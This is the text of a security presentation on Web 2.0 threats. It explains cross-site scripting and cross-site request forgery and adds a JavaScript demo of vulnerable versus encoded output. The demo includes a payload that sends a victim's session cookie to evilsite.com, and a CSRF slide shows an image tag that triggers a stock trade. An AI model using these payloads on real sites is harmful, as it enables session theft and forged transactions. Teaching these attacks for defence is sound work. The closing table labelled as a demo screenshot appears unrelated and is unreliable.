Web 2.0 Security Threats: What you need to know
Steve Orrin
Director of Security Solutions, SSG-SPI
Intel Corp.
Increasing Risks
• Time-to-Market: complexity is growing
• Mixed bag of standards: interoperability, reuse, etc.
• Continued rise in malicious activity
• Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc.)
• Liability precedents for security incidents
• Increasing business risks
• Many of the attacks occur at the Application/Service layers: The New Frontier
[Chart: Reported Vulnerabilities & Incidents, 2000-2006. Left axis: Vulnerabilities Reported (0 to 9,000); right axis: Incidents Reported (0 to 400,000). Source: CERT & CSI/FBI Survey]
Threats to Web 2.0 Applications & Environments
• The Building Blocks
  – XSS – Cross Site Scripting
    • Demo – Dynamic Images
    • Examples
  – CSRF – Cross Site Request Forgery
    • Walk-through Demo
• The New New Threats
  • AJAX Vulnerabilities
    – Information Leakage
    – Repudiation (CSRF) and XSS
    – Bridging
  • XDS – Cross Domain Scripts: External Download + Local Execution
    – Demo
  • XSS Worms – Samy, QT/MySpace
  • RSS-based Threats
Cross Site Scripting – Quick Review
• First Reported: Early 2000
• What is it?
  – The user provides unexpected data in a request that is echoed back to the user as part of the response.
  – The unexpected data contains a script that is executed in the context of the user's browser session.
• Why does Cross Site Scripting happen?
  – User input is used to build/customize/personalize the response.
  – The application does not anticipate that the data will be executed in the user's browser context.
• Result
  – "Virtual hijacking" of the session: any information flowing between the legitimate user and the site can be manipulated or transmitted to a 3rd party.
  – Hook for phishing and identity theft.
Cross Site Scripting
Cross-site scripting attacks (commonly referred to as CSS or XSS; XSS is now preferred to avoid confusion with Cascading Style Sheets) inject custom URL parameters or code into a valid web-application URL or embedded data field. In general, these XSS techniques are the result of poor web-application development practices: untrusted input is echoed into the response without being encoded for the context it lands in.
Examples:
• Full HTML substitution such as:
  – http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
  – http://mybank.com/ebanking?page=1&client=">
Source: Michael Schrenk (mike@schrenk.com) & Steve Orrin (steve.orrin@intel.com)
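The second example above works by closing the value attribute and the tag the parameter is echoed into, then injecting markup of the attacker's choosing. The following is an added example, not code from the slides or from Intel, that shows the reflection side by side in its vulnerable and HTML-encoded forms. The function names, the banner template and the payload (which follows the shape of the slide's `client=">` example and sends the cookie to the evilsite.com host from the slide) are assumptions for illustration.

```javascript
// Added example: reflected XSS in a personalised form field, unencoded vs encoded.
// renderBannerUnsafe / renderBannerSafe / escapeHtml / countTags are assumed names.

// Vulnerable: the untrusted query parameter is concatenated straight into markup,
// so a value containing "> terminates the attribute and the <input> element.
function renderBannerUnsafe(params) {
  const client = params.client || 'guest';
  return `<input type="text" name="client" value="${client}">`;
}

// Encode the five characters that can change HTML structure or break out of a
// double- or single-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: same template, but the parameter is encoded for the attribute context.
function renderBannerSafe(params) {
  const client = params.client || 'guest';
  return `<input type="text" name="client" value="${escapeHtml(client)}">`;
}

// Simple check for the demo: count opening tags in the rendered output. The template
// defines exactly one (<input>); anything beyond that came from the parameter.
function countTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

// Constructed payload in the shape of the slide's example: close the attribute and
// the tag, then inject a script that ships the session cookie to a third party.
const payload =
  '"><script>document.location="http://evilsite.com/?c="+document.cookie</script>';

function demo() {
  const unsafe = renderBannerUnsafe({ client: payload });
  const safe = renderBannerSafe({ client: payload });
  return {
    unsafe,
    safe,
    unsafeTags: countTags(unsafe), // 2: the template's <input> plus the injected <script>
    safeTags: countTags(safe),     // 1: the payload is now inert text inside the attribute
  };
}

console.log(demo());
```

Encoding is context-specific: the table above is right for HTML element content and quoted attributes, but a value echoed into a JavaScript string, a URL or a CSS property needs the encoder for that context instead.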
CSRF
What is Cross Site Request Forgery?
• Cross Site Request Forgery is a style of attack that lets an attacker send arbitrary HTTP requests from a victim user's browser.
• Websites that allow a user to perform tasks often trigger those tasks by having the browser request a specific URL:
  – Example: http://site/stocks?buy=1000&stock=ebay
• If a user is logged into the site and an attacker tricks their browser into making a request to one of these task URLs, the task is performed and logged as the logged-in user, because the browser attaches the session cookie automatically.
• Typically the attacker embeds an IMG tag or other HTML/JavaScript that requests a specific 'task URL' (on a page the attacker controls, or via XSS on a site the victim trusts); if the user is logged in, the request is executed without their knowledge.
• These sorts of attacks are fairly difficult to detect, potentially leaving a user debating with the website/company as to whether or not the stocks bought the day before were initiated by the user after the price plummeted.
Source: Chris Shiflett, principal of OmniTI (http://shiflett.org/)
CSRF in Action
Typical Web Site Code
Here is my sample image: (followed by an IMG tag whose src points at an ordinary image)
Attack Code
Here is my sample image: (followed by an IMG tag whose src is the task URL from the previous slide, http://site/stocks?buy=1000&stock=ebay, so the victim's browser performs the trade while fetching the "image")
Source: Chris Shiflett, principal of OmniTI (http://shiflett.org/)
CSRF - Demo
• Normal stock trade
• Image Source vulnerability for CSRF attack
Source: Erik Johnson & Steve Orrin, Intel Corp.
[Demo screenshot: table rows as captured; column headers not recoverable]
Semaj1212 | 4/23/2008 | 111 | 4 | 0 | technology
Semaj1212 | 4/23/2008 | 158 | 26 | 0 | technology
Semaj1212 | 4/23/2008 | 147 | 34 | 0 | technology
Semaj1212 | 4/23/2008 | 113 | 14 | 0 | technology
Semaj1212 | 4/23/2008 | 104 | 7 | 0 | technology
Semaj1212 | 4/23/2008 | 108 | 10 | 0 | technology
Semaj1212 | 4/23/2008 | 58 | 4 | 0 | technology
Semaj1212 | 4/23/2008 | 81 | 3 | 0 | technology
Semaj1212 | 4/23/2008 | 30 | 5 | 0 | technology
Semaj1212 | 4/23/2008 | 50 | 2 | 0 | technology
Semaj1212 | 4/23/2008 | 73 | 3 | 0 | technology
Semaj1212 | 4/23/2008 | 90 | 2 | 0 | technology
Semaj1212 | 4/23/2008 | 25 | 1 | 0 | technology
Semaj1212 | 4/23/2008 | 151 | 17 | 0 | technology
Semaj1212 | 4/23/2008 | 98 | 11 | 0 | technology
Semaj1212 | 7/10/2008 | 54 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 53 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 178503 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 52 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 23 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 35 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 112 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 44 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 202 | 0 | 0 | business
Semaj1212 | 7/10/2008 | 36 | 0 | 0 | business